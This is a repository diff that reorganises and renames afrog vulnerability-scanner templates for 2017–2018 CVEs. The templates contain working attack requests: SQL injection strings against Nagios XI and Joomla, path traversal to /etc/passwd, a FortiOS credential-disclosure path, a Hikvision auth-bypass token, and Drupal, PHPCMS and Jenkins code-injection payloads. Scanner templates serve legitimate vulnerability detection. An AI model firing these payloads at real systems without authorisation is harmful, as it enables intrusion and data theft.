7	7		description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
8	8		reference:
9	9		- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
10	10		- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
11		-	tags: cve,cve2017,rce,oracle,weblogic,oast
12		-	classification:
13		-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
14		-	cvss-score: 7.50
15		-	cve-id: CVE-2017-10271
16	11
17		-	transport: http
18	12		set:
19	13		reverse: newReverse()
20	14		reverseURL: reverse.url
		skipped 36 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/supervisord-cve-2017-11610.yml afrog-pocs/CVE/2017/CVE-2017-11610.yaml

1		-	id: supervisord-cve-2017-11610
	1	+	id: CVE-2017-11610
2	2
3	3		info:
4		-	name: supervisord-cve-2017-11610
	4	+	name: Supervisor XMLRPC Exec
5	5		author: Loneyer
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		reverse: newReverse()
12	10		reverseURL: reverse.url
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /RPC2
19	16		body: \|-
		skipped 6 lines
26	23		</param>
27	24		</params>
28	25		</methodCall>
29		-	follow_redirects: false
30	26		expression: response.status == 200 && reverse.wait(5)
31	27		expression: r0()
32	28

afrog-pocs/cve/2017/CVE-2017-12149.yaml afrog-pocs/CVE/2017/CVE-2017-12149.yaml

Content is identical

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/tomcat-cve-2017-12615-rce.yml afrog-pocs/CVE/2017/CVE-2017-12615.yaml

1		-	id: tomcat-cve-2017-12615-rce
	1	+	id: CVE-2017-12615
2	2
3	3		info:
4		-	name: tomcat-cve-2017-12615-rce
	4	+	name: Apache Tomcat RCE
5	5		author: j4ckzh0u(https://github.com/j4ckzh0u)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		filename: randomLowercase(6)
12	10		verifyStr: randomLowercase(12)
		skipped 1 lines
14	12		rules:
15	13		r0:
16	14		request:
17		-	cache: true
18	15		method: PUT
19	16		path: /{{filename}}.jsp/
20	17		body: '{{verifyStr}} <%-- {{commentStr}} --%>'
21		-	follow_redirects: false
22	18		expression: response.status == 201
23	19		r1:
24	20		request:
25		-	cache: true
26	21		method: GET
27	22		path: /{{filename}}.jsp
28		-	follow_redirects: false
29	23		expression: response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr))
30	24		expression: r0() && r1()
31	25

afrog-pocs/cve/2017/CVE-2017-12629.yml afrog-pocs/CVE/2017/CVE-2017-12629.yaml

Content is identical

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2017/couchdb-cve-2017-12635.yml afrog-pocs/CVE/2017/CVE-2017-12635.yaml

1		-	id: couchdb-cve-2017-12635
	1	+	id: CVE-2017-12635
2	2
3	3		info:
4		-	name: couchdb-cve-2017-12635
	4	+	name: CouchDB CVE-2017-12635
5	5		author: j4ckzh0u(https://github.com/j4ckzh0u)
6	6		severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomLowercase(32)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: PUT
17	14		path: /_users/org.couchdb.user:{{r1}}
18	15		headers:
		skipped 7 lines
26	23		"roles": [],
27	24		"password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
28	25		}
29		-	follow_redirects: false
30	26		expression: response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
31	27		expression: r0()
32	28

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nextjs-cve-2017-16877.yml afrog-pocs/CVE/2017/CVE-2017-16877.yaml

1		-	id: nextjs-cve-2017-16877
	1	+	id: CVE-2017-16877
2	2
3	3		info:
4		-	name: nextjs-cve-2017-16877
	4	+	name: Nextjs v2.4.1 LFI
5	5		author: Loneyer
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /_next/../../../../../../../../../../etc/passwd
16		-	follow_redirects: false
17	13		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
18	14		expression: r0()
19	15
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/netgear-cve-2017-5521.yml afrog-pocs/CVE/2017/CVE-2017-5521.yaml

1		-	id: netgear-cve-2017-5521
	1	+	id: CVE-2017-5521
2	2
3	3		info:
4		-	name: netgear-cve-2017-5521
	4	+	name: Bypassing Authentication on NETGEAR Routers
5	5		author: betta(https://github.com/betta-cyber)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /passwordrecovered.cgi?id=get_rekt
16		-	follow_redirects: false
17	13		expression: response.status == 200 && "right\">Router\\sAdmin\\sUsername<".bmatches(response.body) && "right\">Router\\sAdmin\\sPassword<".bmatches(response.body) && response.body.bcontains(b"left")
18	14		expression: r0()
19	15
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2017/hikvision-cve-2017-7921.yml afrog-pocs/CVE/2017/CVE-2017-7921.yaml

1		-	id: hikvision-cve-2017-7921
	1	+	id: CVE-2017-7921
2	2
3	3		info:
4		-	name: hikvision-cve-2017-7921
	4	+	name: Hikvision CVE-2017-7921
5	5		author: whwlsfb(https://github.com/whwlsfb)
6	6		severity: critical
7	7		description: \|
		skipped 2 lines
10	10		System/configurationFile?auth=YWRtaW46MTEK
11	11		reference:
12	12		- https://www.cnblogs.com/charon1937/p/13819804.html
13		-	manual: true
14		-	transport: http
	13	+	- https://nvd.nist.gov/vuln/detail/CVE-2017-7921
	14	+
15	15		rules:
16	16		r0:
17	17		request:
18		-	cache: true
19	18		method: GET
20	19		path: /system/deviceInfo?auth=YWRtaW46MTEK
21		-	follow_redirects: false
22	20		expression: response.status == 200 && response.headers["content-type"] == "application/xml" && response.body.bcontains(b"<firmwareVersion>")
23	21		expression: r0()
24	22
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/joomla-cve-2017-8917-sqli.yml afrog-pocs/CVE/2017/CVE-2017-8917.yaml

1		-	id: joomla-cve-2017-8917-sqli
	1	+	id: CVE-2017-8917
2	2
3	3		info:
4		-	name: joomla-cve-2017-8917-sqli
5		-	author:
6		-	severity: high
	4	+	name: Joomla SQL Injection
	5	+	author: unkown
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)
16	13		expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/phpunit-cve-2017-9841-rce.yml afrog-pocs/CVE/2017/CVE-2017-9841.yaml

1		-	id: phpunit-cve-2017-9841-rce
	1	+	id: CVE-2017-9841
2	2
3	3		info:
4		-	name: phpunit-cve-2017-9841-rce
	4	+	name: phpunit rce
5	5		author: p0wd3r,buchixifan
6	6		severity: high
7	7
		skipped 16 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/gitlist-rce-cve-2018-1000533.yml afrog-pocs/CVE/2018/CVE-2018-1000533.yaml

1		-	id: gitlist-rce-cve-2018-1000533
	1	+	id: CVE-2018-1000533
2	2
3	3		info:
4		-	name: gitlist-rce-cve-2018-1000533
	4	+	name: GitList < 0.6.0 RCE
5	5		author: Print1n(https://print1n.top)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
		skipped 1 lines
14	12		rules:
15	13		r0:
16	14		request:
17		-	cache: true
18	15		method: GET
19	16		path: /
20	17		expression: response.status == 200 && "gitlist".bmatches(response.body)
		skipped 2 lines
23	20		project_name: search["project_name"]
24	21		r1:
25	22		request:
26		-	cache: true
27	23		method: POST
28	24		path: /{{project_name}}/tree/a/search
29	25		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2018/jenkins-cve-2018-1000600.yml afrog-pocs/CVE/2018/CVE-2018-1000600.yaml

		skipped 1 lines
2	2
3	3		info:
4	4		name: Pre-auth Fully-responded SSRF
	5	+	author: geeknik
	6	+	severity: high
5	7		description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
6	8		reference:
7	9		- https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
8	10		- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
9		-	author: geeknik
10		-	severity: high
11		-	tags: cve,cve2018,jenkins,ssrf,oast
12		-	classification:
13		-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
14		-	cvss-score: 8.80
15		-	cve-id: CVE-2018-1000600
16		-	cwe-id: CWE-200
17	11
18		-	manual: true
19		-	transport: http
20	12		set:
21	13		reverse: newReverse()
22	14		reverseUrl: reverse.url
23	15		rules:
24	16		r0:
25	17		request:
26		-	cache: true
27	18		method: GET
28	19		path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}}
29	20		expression: response.status == 200 && reverse.wait(5)
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2018/jenkins-cve-2018-1000861-rce.yml afrog-pocs/CVE/2018/CVE-2018-1000861.yaml

		skipped 3 lines
4	4		name: Jenkins 2.138 Remote Command Execution
5	5		author: dhiyaneshDK,pikpikcu
6	6		severity: critical
	7	+	description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way."
7	8		reference:
8	9		- https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
9		-	tags: cve,cve2018,jenkin,rce,jenkins
10		-	classification:
11		-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
12		-	cvss-score: 9.80
13		-	cve-id: CVE-2018-1000861
14		-	cwe-id: CWE-502
15		-	description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way."
	10	+	- https://nvd.nist.gov/vuln/detail/CVE-2018-1000861
16	11
17		-	manual: true
18		-	transport: http
19	12		set:
20	13		rand: randomLowercase(4)
21	14		rules:
22	15		r0:
23	16		request:
24		-	cache: true
25	17		method: GET
26	18		path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload;
27		-	follow_redirects: false
28	19		expression: response.status == 200 && response.body.bcontains(bytes("package#" + rand))
29	20		expression: r0()

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nagio-cve-2018-10735.yml afrog-pocs/CVE/2018/CVE-2018-10735.yaml

1		-	id: nagio-cve-2018-10735
	1	+	id: CVE-2018-10735
2	2
3	3		info:
4		-	name: nagio-cve-2018-10735
	4	+	name: Nagios XI commandline.php SQL Inject
5	5		author: 0x_zmz(github.com/0x-zmz)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r: randomInt(2000000000, 2100000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{r}}))%23
18		-	follow_redirects: false
19	15		expression: response.body.bcontains(bytes(md5(string(r))))
20	16		expression: r0()
21	17

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nagio-cve-2018-10736.yml afrog-pocs/CVE/2018/CVE-2018-10736.yaml

1		-	id: nagio-cve-2018-10736
	1	+	id: CVE-2018-10736
2	2
3	3		info:
4		-	name: nagio-cve-2018-10736
	4	+	name: Nagios XI SQL Inject
5	5		author: 0x_zmz(github.com/0x-zmz)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r: randomInt(2000000000, 2100000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{r}}))%23
18		-	follow_redirects: false
19	15		expression: response.body.bcontains(bytes(md5(string(r))))
20	16		expression: r0()
21	17
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nagio-cve-2018-10737.yml afrog-pocs/CVE/2018/CVE-2018-10737.yaml

1		-	id: nagio-cve-2018-10737
	1	+	id: CVE-2018-10737
2	2
3	3		info:
4		-	name: nagio-cve-2018-10737
	4	+	name: Nagios XI SQL Inject
5	5		author: 0x_zmz(github.com/0x-zmz)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r: randomInt(2000000000, 2100000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /nagiosql/admin/logbook.php
18	15		headers:
19	16		Content-Type: application/x-www-form-urlencoded
20	17		body: txtSearch=' and (select 1 from(select count(),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#
21		-	follow_redirects: false
22	18		expression: response.body.bcontains(bytes(md5(string(r))))
23	19		expression: r0()
24	20
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nagio-cve-2018-10738.yml afrog-pocs/CVE/2018/CVE-2018-10738.yaml

1		-	id: nagio-cve-2018-10738
	1	+	id: CVE-2018-10738
2	2
3	3		info:
4		-	name: nagio-cve-2018-10738
	4	+	name: Nagios XI before 5.4.13 SQL Inject
5	5		author: 0x_zmz(github.com/0x-zmz)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r: randomInt(2000000000, 2100000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /nagiosql/admin/menuaccess.php
18	15		headers:
19	16		Content-Type: application/x-www-form-urlencoded
20	17		body: selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#
21		-	follow_redirects: false
22	18		expression: response.body.bcontains(bytes(md5(string(r))))
23	19		expression: r0()
24	20

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/flexpaper-cve-2018-11686.yml afrog-pocs/CVE/2018/CVE-2018-11686.yaml

1		-	id: flexpaper-cve-2018-11686
	1	+	id: CVE-2018-11686
2	2
3	3		info:
4		-	name: flexpaper-cve-2018-11686
	4	+	name: FlexPaper PHP Publish Service RCE
5	5		author: Soveless(https://github.com/Soveless)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		fileName: randomLowercase(6)
12	10		verifyStr: randomLowercase(6)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /php/change_config.php
19	16		headers:
		skipped 3 lines
23	20		expression: response.status == 302 \|\| response.status == 200
24	21		r1:
25	22		request:
26		-	cache: true
27	23		method: POST
28	24		path: /php/change_config.php
29	25		headers:
		skipped 3 lines
33	29		expression: response.status == 302 \|\| response.status == 200
34	30		r2:
35	31		request:
36		-	cache: true
37	32		method: GET
38	33		path: /php/setup.php?step=2&PDF2SWF_PATH=printf%20{{verifyStr}}%25%25{{verifyStr}}%20%3e%20{{fileName}}
39	34		follow_redirects: false
40	35		expression: response.status == 200
41	36		r3:
42	37		request:
43		-	cache: true
44	38		method: GET
45	39		path: /php/{{fileName}}pdf2swf
46	40		expression: response.status == 200 && response.body.bcontains(bytes(string(verifyStr + "%" + verifyStr)))
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2018/CVE-2018-11759.yml afrog-pocs/CVE/2018/CVE-2018-11759.yaml

		skipped 6 lines
7	7		description: The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.
8	8		reference:
9	9		- https://github.com/immunIT/CVE-2018-11759
10		-	tags: cve,cve2018,apache,tomcat,status
11		-	classification:
12		-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
13		-	cvss-score: 7.50
14		-	cve-id: CVE-2018-11759
15		-	cwe-id: CWE-22
	10	+	- https://nvd.nist.gov/vuln/detail/CVE-2018-11759
16	11
17		-	manual: true
18		-	transport: http
19	12		rules:
20	13		r0:
21	14		request:
22		-	cache: true
23	15		method: GET
24	16		path: /jkstatus;
25		-	follow_redirects: false
26	17		expression: response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body)
27	18		r1:
28	19		request:
29		-	cache: true
30	20		method: GET
31	21		path: /jkstatus;?cmd=dump
32		-	follow_redirects: false
33	22		expression: response.status == 200 && "ServerRoot=*".bmatches(response.body)
34	23		expression: r0() && r1()
35	24

■ ■ ■ ■ ■ ■

afrog-pocs/CVE/2018/CVE-2018-12613.yaml

1	+	id: CVE-2018-12613
2	+
3	+	info:
4	+	name: PhpMyAdmin 4.8.1 Remote File Inclusion
5	+	author: p0wd3r
6	+	severity: critical
7	+
8	+	rules:
9	+	r0:
10	+	request:
11	+	method: GET
12	+	path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
13	+	expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
14	+	expression: r0()
15	+
16	+

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/fortigate-cve-2018-13379-readfile.yml afrog-pocs/CVE/2018/CVE-2018-13379.yaml

1		-	id: fortigate-cve-2018-13379-readfile
	1	+	id: CVE-2018-13379
2	2
3	3		info:
4		-	name: fortigate-cve-2018-13379-readfile
	4	+	name: FortiOS - Credentials Disclosure
5	5		author: tom0li(https://tom0li.github.io/)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
16	13		headers:
		skipped 6 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/kibana-cve-2018-17246.yml afrog-pocs/CVE/2018/CVE-2018-17246.yaml

1		-	id: kibana-cve-2018-17246
	1	+	id: CVE-2018-17246
2	2
3	3		info:
4		-	name: kibana-cve-2018-17246
	4	+	name: Kibana Local File Inclusion
5	5		author: canc3s(https://github.com/canc3s)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
16		-	follow_redirects: false
17	13		expression: response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\""))
18	14		expression: r0()
19	15
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/phpcms-cve-2018-19127.yml afrog-pocs/CVE/2018/CVE-2018-19127.yaml

1		-	id: phpcms-cve-2018-19127
	1	+	id: CVE-2018-19127
2	2
3	3		info:
4		-	name: phpcms-cve-2018-19127
	4	+	name: PHPCMS 2008 Remote Code Execution
5	5		author: pa55w0rd(www.pa55w0rd.online/)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r: randomInt(800000000, 1000000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss
18	15		follow_redirects: true
19	16		expression: response.status == 200
20	17		r1:
21	18		request:
22		-	cache: true
23	19		method: GET
24	20		path: /data/cache_template/rss.tpl.php?1={{r}}
25	21		follow_redirects: true
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/rails-cve-2018-3760-rce.yml afrog-pocs/CVE/2018/CVE-2018-3760.yaml

1		-	id: rails-cve-2018-3760-rce
	1	+	id: CVE-2018-3760
2	2
3	3		info:
4		-	name: rails-cve-2018-3760-rce
	4	+	name: Ruby On Rails Path Traversal
5	5		author: leezp
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /assets/file:%2f%2f/etc/passwd
16		-	follow_redirects: false
17	13		expression: response.status == 500 && response.body.bcontains(b"FileOutsidePaths")
18	14		output:
19	15		search: '"/etc/passwd is no longer under a load path: (?P<path>.*?),".bsubmatch(response.body)'
20	16		path: search["path"]
21	17		r1:
22	18		request:
23		-	cache: true
24	19		method: GET
25	20		path: /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
26		-	follow_redirects: false
27	21		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
28	22		expression: r0() && r1()
29	23
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml afrog-pocs/CVE/2018/CVE-2018-6605.yaml

1		-	id: joomla-ext-zhbaidumap-cve-2018-6605-sqli
	1	+	id: CVE-2018-6605
2	2
3	3		info:
4		-	name: joomla-ext-zhbaidumap-cve-2018-6605-sqli
	4	+	name: Joomla Ext zhbaidumap sql inject
5	5		author: leezp
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		rand: randomInt(2000000000, 2100000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
18	15		headers:
19	16		Content-Type: application/x-www-form-urlencoded
20	17		body: id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{rand}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+
21		-	follow_redirects: false
22	18		expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) && response.body.bcontains(b"dataexists")
23	19		expression: r0()
24	20
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2018/dedecms-cve-2018-6910.yml afrog-pocs/CVE/2018/CVE-2018-6910.yaml

1		-	id: dedecms-cve-2018-6910
	1	+	id: CVE-2018-6910
2	2
3	3		info:
4	4		name: dedecms-cve-2018-6910
		skipped 2 lines
7	7		reference:
8	8		- https://nvd.nist.gov/vuln/detail/cve-2018-6910
9	9
10		-	manual: true
11		-	transport: http
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /include/downmix.inc.php
18	15		expression: response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/joomla-cve-2018-7314-sql.yml afrog-pocs/CVE/2018/CVE-2018-7314.yaml

1		-	id: joomla-cve-2018-7314-sql
	1	+	id: CVE-2018-7314
2	2
3	3		info:
4		-	name: joomla-cve-2018-7314-sql
	4	+	name: Joomla SQL Inject
5	5		author: 南方有梦(http://github.com/hackgov)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X
18	15		expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/uwsgi-cve-2018-7490.yml afrog-pocs/CVE/2018/CVE-2018-7490.yaml

1		-	id: uwsgi-cve-2018-7490
	1	+	id: CVE-2018-7490
2	2
3	3		info:
4		-	name: uwsgi-cve-2018-7490
5		-	author:
	4	+	name: uWSGI PHP Plugin Directory Traversal
	5	+	author: unkown
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
16		-	follow_redirects: false
17	13		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/drupal-cve-2018-7600-rce.yml afrog-pocs/CVE/2018/CVE-2018-7600.yaml

1		-	id: drupal-cve-2018-7600-rce
	1	+	id: CVE-2018-7600
2	2
3	3		info:
4		-	name: drupal-cve-2018-7600-rce
5		-	author:
	4	+	name: Drupal Drupalgeddon 2 RCE
	5	+	author: unkown
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomLowercase(4)
12	10		r2: randomLowercase(4)
13	11		rules:
14	12		drupal70:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}
19	16		headers:
		skipped 6 lines
26	23		build_id: search["build_id"]
27	24		drupal71:
28	25		request:
29		-	cache: true
30	26		method: POST
31	27		path: /?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}
32	28		headers:
		skipped 3 lines
36	32		expression: response.body.bcontains(bytes(r1 + "%" + r2))
37	33		drupal80:
38	34		request:
39		-	cache: true
40	35		method: POST
41	36		path: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
42	37		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/couchcms-cve-2018-7662.yml afrog-pocs/CVE/2018/CVE-2018-7662.yaml

1		-	id: couchcms-cve-2018-7662
	1	+	id: CVE-2018-7662
2	2
3	3		info:
4		-	name: couchcms-cve-2018-7662
	4	+	name: Couchcms 2.0 Dictionary Disclosure
5	5		author: we1x4n(https://we1x4n.github.io/)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /includes/mysql2i/mysql2i.func.php
16		-	follow_redirects: false
17	13		expression: 'response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")'
18	14		r1:
19	15		request:
20		-	cache: true
21	16		method: GET
22	17		path: /addons/phpmailer/phpmailer.php
23		-	follow_redirects: false
24	18		expression: 'response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")'
25	19		expression: r0() && r1()
26	20
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/dedecms-cve-2018-7700-rce.yml afrog-pocs/CVE/2018/CVE-2018-7700.yaml

1		-	id: dedecms-cve-2018-7700-rce
	1	+	id: CVE-2018-7700
2	2
3	3		info:
4		-	name: dedecms-cve-2018-7700-rce
	4	+	name: Dedecms V5.7 后台任意代码执行
5	5		author: harris2015(https://github.com/harris2015)
